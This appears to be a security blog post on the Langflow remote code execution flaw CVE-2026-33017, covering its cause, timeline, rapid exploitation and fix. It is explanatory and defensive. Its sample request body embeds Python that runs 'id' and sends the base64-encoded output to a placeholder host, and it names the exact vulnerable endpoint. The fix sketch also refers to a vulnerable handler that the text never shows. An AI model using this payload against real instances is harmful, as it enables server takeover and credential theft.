Hackers Exploited a Critical Langflow Bug Within 20 Hours of Disclosure (CVE-2026-33017)

A critical vulnerability in Langflow—an open-source visual framework for building AI agents and retrieval-augmented generation (RAG) pipelines—was weaponized extremely quickly.

Korede Akinsanya

3/26/2026 · 3 min read

What is Langflow?

Langflow is a popular open-source visual framework (with over 145,000 GitHub stars) for building AI agents, workflows, and Retrieval-Augmented Generation (RAG) pipelines. It provides a drag-and-drop interface where users define "flows" — essentially graphs of components (nodes) that can include custom Python code for AI tasks like LLM integrations, data processing, or agent behaviors.

Many organizations and individuals self-host Langflow instances, often exposing them publicly for demos, shared chatbots, or collaborative workflows. This widespread exposure made it an attractive target.
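To make the "graphs of components" idea concrete, a serialized flow is roughly a set of nodes plus the edges wiring them together. The sketch below is illustrative only — the field names and component types are simplified placeholders, not Langflow's exact schema:

```python
# Illustrative sketch of a flow's serialized shape: a graph of
# component nodes and the edges connecting them. Field names and
# component types here are simplified, not Langflow's real schema.
flow = {
    "id": "demo-flow",
    "nodes": [
        {"id": "prompt-1", "type": "PromptTemplate",
         "data": {"template": "Summarize: {text}"}},
        {"id": "llm-1", "type": "LLMComponent",
         "data": {"model": "gpt-4o-mini"}},
    ],
    "edges": [
        {"source": "prompt-1", "target": "llm-1"},
    ],
}

# Each node carries its own configuration -- and, for custom
# components, can carry arbitrary Python source that the server
# executes when the flow is built. That is the capability the
# vulnerability below abuses.
```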

The Vulnerability: CVE-2026-33017 (Critical, CVSS 9.3)

  • Affected Versions: Langflow versions prior to 1.9.0 (primarily up to 1.8.1).

  • Type: Unauthenticated Remote Code Execution (RCE).

  • Root Cause: The endpoint POST /api/v1/build_public_tmp/{flow_id}/flow was designed to allow unauthenticated building of "public flows" (for sharing without login). When an optional data parameter was supplied in the request, the server used the attacker-controlled flow data (instead of trusted data from the database). This data could include arbitrary Python code in node definitions. The code was then passed directly to Python's exec() function with zero sandboxing or restrictions.

  • Impact: A single HTTP POST request from an unauthenticated attacker could execute arbitrary Python code on the server with the full privileges of the Langflow process. This allowed:

    • Reading environment variables (often containing API keys for OpenAI, Anthropic, databases, etc.).

    • Accessing/modifying files.

    • Installing malware or backdoors.

    • Deploying reverse shells.

    • Full server compromise.

This bug was similar to a previous critical flaw (CVE-2025-3248) in the /api/v1/validate/code endpoint, but the fix for that one didn't cover the public flow build endpoint properly.

Discovery and Disclosure Timeline

  • February 25, 2026: Security researcher Aviral Srivastava reported the issue via GitHub Security Advisory.

  • March 10, 2026: Langflow team acknowledged the report and merged a fix in PR #12160.

  • March 16–17, 2026: Official advisory (GHSA-vwmf-pq79-vjvx) published; CVE-2026-33017 assigned with CVSS 9.3.

  • The advisory clearly described the vulnerable endpoint and the unsafe use of attacker-supplied data with exec().

No public Proof-of-Concept (PoC) exploit was available on GitHub or elsewhere at the time of the first attacks.

Exploitation: Attacks Started Within ~20 Hours

On March 17, 2026 (around 20:05 UTC), the advisory went public.

  • Within ~20 hours (by March 18), Sysdig's Threat Research Team observed the first exploitation attempts in their honeypots.

  • Attackers built working exploits directly from the advisory text — no public PoC needed.

  • Exploitation was extremely simple: a single crafted HTTP POST request with malicious flow data containing Python payloads.

  • Example payload style observed (simplified):

    • Code that runs commands like id, base64-encodes the output, and exfiltrates it to an attacker-controlled server (e.g., via interactsh or custom domains).

    • Later payloads stole credentials, accessed files, and delivered staged malware.

  • ~25-hour mark: First successful data exfiltration observed.

  • Attacks involved mass scanning for exposed Langflow instances (common on the internet, especially those with public flows enabled for demos).
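The payload style described above — run a command, base64-encode the output, ship it to a callback host — can be sketched as the request body an attacker would construct. This is a defanged illustration: the endpoint path comes from the advisory, but the callback host is a placeholder and nothing here is sent anywhere:

```python
import base64  # used inside the embedded payload; imported here for clarity
import json

# Sketch of the payload style reported by Sysdig (simplified and defanged).
# "attacker.example" is a placeholder; the node structure is illustrative.
CALLBACK = "https://attacker.example/collect"

node_code = (
    "import base64, subprocess, urllib.request\n"
    "out = subprocess.check_output(['id'])\n"
    "tok = base64.b64encode(out).decode()\n"
    f"urllib.request.urlopen('{CALLBACK}?d=' + tok)\n"
)

# The whole attack is one unauthenticated request:
#   POST /api/v1/build_public_tmp/<flow_id>/flow
body = json.dumps({"data": {"nodes": [{"data": {"code": node_code}}]}})
```

When the server builds this "flow," the embedded code runs id, base64-encodes the result, and exfiltrates it as a query parameter — exactly the recon-then-exfiltrate pattern observed in the honeypots.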

This speed highlights how quickly threat actors (including opportunistic scanners and more sophisticated groups) can operationalize clear vulnerability descriptions in popular open-source tools.

Observed attacker behavior included:

  • Credential harvesting (API keys, secrets).

  • File system access.

  • Payload staging for persistence.

CISA later added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog due to active in-the-wild exploitation.

Why So Fast?

  • No authentication required — just one request.

  • Trivial to exploit once the endpoint and exec() behavior were understood.

  • High number of exposed instances (self-hosted Langflow is popular for AI experimentation).

  • Modern attackers monitor GitHub advisories and security disclosures in real time.

  • The description in the advisory was detailed enough for skilled actors to recreate the exploit quickly.

Response and Fix

  • Fixed in Langflow 1.9.0 (and some interim releases like 1.8.2 in certain branches).

  • The patch added proper authentication checks to the public flow endpoint and prevented attacker-supplied data from being executed unchecked.

  • Langflow team responded relatively quickly (acknowledgment within ~2 weeks of report).
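The shape of the fix can be sketched in the same terms as the vulnerable handler above. This is an illustration of the described behavior, not the actual PR #12160 diff: authenticate first, and always build from the trusted stored flow, never from client-supplied data:

```python
# Sketch of the patched behavior (illustrative -- not the actual
# PR #12160 code): require authentication, and ignore any
# client-supplied flow data in favor of the stored copy.

STORED_FLOWS = {"demo-flow": {"nodes": []}}  # trusted copy from the database

class AuthError(Exception):
    """Raised when an unauthenticated caller hits the endpoint."""

def build_public_flow_fixed(flow_id, data=None, user=None):
    if user is None:
        # Unauthenticated requests are rejected outright.
        raise AuthError("authentication required")
    # Client-supplied `data` is never executed; only the trusted
    # flow definition from the database is built.
    return STORED_FLOWS[flow_id]
```

The key design choice is that the optional data parameter no longer influences what gets executed at all — removing the attacker-controlled path entirely rather than trying to sanitize it.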

Recommendations from researchers and vendors:

  • Update immediately to version 1.9.0 or newer.

  • If self-hosting: Check for exposed instances, restrict public flows, or place behind authentication/reverse proxies.

  • Scan for vulnerable deployments using tools like runZero or custom Shodan queries.

  • Monitor for signs of compromise (unusual outbound connections, new files, stolen env vars).
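As a starting point for the "check for exposed instances" step, a small script can compare a deployment's reported version against the fixed release. This assumes the instance exposes a version endpoint at /api/v1/version returning JSON with a "version" field — verify that against your deployment before relying on it:

```python
import json
import urllib.request

def parse_version(v):
    """Parse a dotted version string like '1.8.1' into a comparable tuple."""
    return tuple(int(p) for p in v.split(".")[:3])

def is_vulnerable(version, fixed="1.9.0"):
    """True when `version` predates the fixed release."""
    return parse_version(version) < parse_version(fixed)

def check_instance(base_url):
    """Flag a pre-1.9.0 Langflow deployment.

    Assumes the instance exposes GET /api/v1/version returning
    JSON like {"version": "1.8.1"}; adjust for your deployment.
    """
    with urllib.request.urlopen(f"{base_url}/api/v1/version", timeout=5) as r:
        version = json.load(r)["version"]
    return is_vulnerable(version)

# Example (hypothetical internal host):
# check_instance("https://langflow.internal.example")
```

Note the tuple comparison rather than string comparison: "1.10.0" correctly sorts after "1.9.0" as (1, 10, 0) > (1, 9, 0), where a naive string compare would get it wrong.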

This incident serves as a stark reminder of the risks of self-hosting AI tools with code execution features, the dangers of unsafe exec() usage, and how fast the threat landscape moves in 2026 — even without a public PoC, exploitation can begin in under a day.

Key Sources for Further Reading

  • Sysdig Technical Analysis: Detailed timeline and observed payloads.

  • Langflow GitHub Advisory (GHSA-vwmf-pq79-vjvx).

  • NVD Entry for CVE-2026-33017.

  • Researcher write-up by Aviral Srivastava on Medium.

If you're running Langflow, or security-testing environments that do, update right away and consider auditing any publicly exposed AI workflow instances.